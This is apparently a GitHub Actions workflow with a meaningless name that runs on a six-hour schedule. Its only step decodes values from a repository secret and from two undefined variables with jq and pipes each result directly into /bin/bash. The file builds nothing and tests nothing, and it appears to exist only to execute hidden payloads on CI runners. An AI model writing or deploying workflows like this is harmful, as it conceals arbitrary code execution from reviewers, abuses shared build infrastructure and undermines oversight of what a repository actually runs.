name: sensiblehumiliated

on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sensiblehumiliated
        env:
          fdav847: ${{ secrets.fdav847 }}
        run: |
          echo $fdav847 | jq -r .uru3670 | /bin/bash
          echo $zs86209 | jq -r .jb848 | /bin/bash
          echo $p02 | jq -r .vnk007 | /bin/bash

